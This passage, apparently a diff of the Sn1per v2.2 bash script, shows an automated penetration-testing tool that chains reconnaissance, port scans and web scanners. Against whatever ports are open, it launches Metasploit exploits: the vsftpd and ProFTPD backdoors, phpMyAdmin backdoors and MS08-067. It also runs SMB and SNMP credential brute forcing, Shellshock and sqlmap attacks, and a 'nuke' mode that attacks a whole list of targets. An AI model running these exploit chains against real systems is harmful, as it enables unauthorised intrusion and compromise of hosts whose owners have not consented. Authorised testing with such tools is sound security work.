cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null - sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt - rm -f /tmp/curl.out 2> /dev/null - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" - for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done; - echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" - python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null - fi - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET" - nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml - - port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` - port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` - - if [ -z "$port_80" ]; - then - echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" - else - echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f http://$a - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb http://$a - echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" - xsstracer $a 80 - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg - fi - - if [ -z "$port_443" ]; - then - echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" - else - echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f https://$a - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb https://$a - echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" - xsstracer $a 443 - echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a - sslscan --no-failed $a - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg - echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg" - fi - - echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - done; - exit -fi - -if [ "$MODE" = "fullportonly" ]; then - echo -e "$OKRED ___ ____ __ __ $RESET" - echo -e "$OKRED / _/_ __/ / /__ ___ ____/ /____ ___ / /_ __$RESET" - echo -e "$OKRED / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET" - echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/ \__/\___/_//_/_/\_, / $RESET" - echo -e "$OKRED /_/ /___/ $RESET" - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET" - if [ -z "$OPT1" ]; then - nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml - else - nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml - fi - echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" - exit -fi - -if [ "$MODE" = "port" ]; then - if [ -z "$OPT1" ]; then - echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET" - exit - fi -fi - -if [ "$MODE" = "nuke" ]; then - if [ "$OPT1" = "report" ]; then - sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 - exit - fi - for a in `cat $TARGET`; do - echo -e "$OKRED " - echo -e "$OKRED ____" - echo -e "$OKRED __,-~~/~ \`---." - echo -e "$OKRED _/_,---( , )" - echo -e "$OKRED __ / < / ) \___" - echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -" - echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/" - echo -e "$OKRED (_ ( \ ( > \)" - echo -e "$OKRED \_( _ < >_>'" - echo -e "$OKRED ~ \`-i' ::>|--\"" - echo -e "$OKRED I;|.|.|" - echo -e "$OKRED <|i::|i|\`." - echo -e "$OKRED (\` ^''\`-' ')" - echo -e "$OKRED --------------------------------------------------------- $RESET" - echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET" - sniper $a - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - done - exit -fi - -echo -e "$OKRED ____ $RESET" -echo -e "$OKRED _________ / _/___ ___ _____$RESET" -echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" -echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" -echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" -echo -e "$OKRED /_/ $RESET" -echo -e "$RESET" -echo -e "$OKORANGE + -- --=[http://crowdshield.com" -echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3" -echo -e "$RESET" -echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" -nslookup $TARGET -host $TARGET -echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET" -xprobe2 $TARGET -if [ $SCAN_TYPE == "DOMAIN" ]; -then - echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" - whois $TARGET - echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" - theharvester -d $TARGET -l 100 -b bing 2> /dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" - dig -x $TARGET - dnsenum $TARGET - mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" - python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null - dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null - echo "" - echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET" - echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET" - echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET" - echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET" - echo -e "$OKBLUE" - curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's///g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt - echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt" - cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null - cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null - sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt - rm -f /tmp/curl.out 2> /dev/null - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" - for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done; - echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" - python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null -fi -echo "" -echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET" -ping -c 1 $TARGET -echo "" -echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" -if [ -z "$OPT1" ]; then - nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml - echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -elif [ "$OPT1" == "web" ]; then - nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -else - nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml - echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -sU -T5 -p U:$OPT1 --open $TARGET -fi - -service postgresql start - -echo "" -echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET" -port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` - -if [ -z "$port_21" ]; -then - echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET" - nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET - msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" -fi - -if [ -z "$port_22" ]; -then - echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET" - cd $PLUGINS_DIR/ssh-audit - python ssh-audit.py $TARGET:22 - cd $INSTALL_DIR - nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET - msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;" -fi - -if [ -z "$port_23" ]; -then - echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET" - echo "" - cisco-torch -A $TARGET - nmap -A -sV -T5 --script=telnet* -p 23 $TARGET - msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;" -fi - -if [ -z "$port_25" ]; -then - echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET" - nmap -A -sV -T5 --script=smtp* -p 25 $TARGET - smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET - msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" -fi - -if [ -z "$port_53" ]; -then - echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET" - nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET -fi - -if [ -z "$port_79" ]; -then - echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET" - nmap -A -sV -T5 --script=finger* -p 79 $TARGET - bin/fingertool.sh $TARGET $USER_FILE -fi - -if [ -z "$port_80" ]; -then - echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f http://$TARGET - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb http://$TARGET - xsstracer $TARGET 80 - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" - echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" - curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/robots.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 - curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 - echo "" - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" - nikto -h http://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - echo -e "$OKRED[+]$RESET ;/Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg" - cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg - - if [ "$MODE" = "web" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" - nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal - echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" - dirb http://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" - wpscan --url http://$TARGET --batch - echo "" - wpscan --url http://$TARGET/wordpress/ --batch - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" - python $CMSMAP -t http://$TARGET - echo "" - python $CMSMAP -t http://$TARGET/wordpress/ - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET" - mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null - arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET - cd $INSTALL_DIR/loot/web/$TARGET-http/ - arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip - unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip - cd $INSTALL_DIR - echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" - sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a - echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" - msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" - echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" - python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 - fi - - if [ $SCAN_TYPE == "DOMAIN" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET" - goohak $TARGET > /dev/null - echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET" - php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt - rm -Rf output/ cookie.txt exploits.conf - GHDB="1" - fi -fi - -if [ -z "$port_110" ]; -then - echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET" - nmap -A -sV -T5 --script=pop* -p 110 $TARGET -fi - -if [ -z "$port_111" ]; -then - echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET" - showmount -a $TARGET - showmount -d $TARGET - showmount -e $TARGET -fi - -if [ -z "$port_135" ]; -then - echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET" - rpcinfo -p $TARGET - nmap -A -p 135 -T5 --script=rpc* $TARGET -fi - -if [ -z "$port_139" ]; -then - echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET" - SMB="1" - echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET" - enum4linux $TARGET - python $SAMRDUMP $TARGET - nbtscan $TARGET - nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET - msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" -fi - -if [ -z "$port_161" ]; -then - echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET" - for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done; - nmap -sU -p 161 --script=snmp* $TARGET -fi - -if [ -z "$port_162" ]; -then - echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET" - for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done; - nmap -A -p 162 --script=snmp* $TARGET -fi - -if [ -z "$port_389" ]; -then - echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET" - nmap -A -p 389 -T5 --script=ldap* $TARGET -fi - -if [ -z "$port_443" ]; -then - echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f https://$TARGET - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb https://$TARGET - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET - sslscan --no-failed $TARGET - testssl $TARGET - echo "" - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 443 - cd $INSTALL_DIR - echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" - echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow - echo "" - echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE - echo "" - echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" - curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Enumerating software on 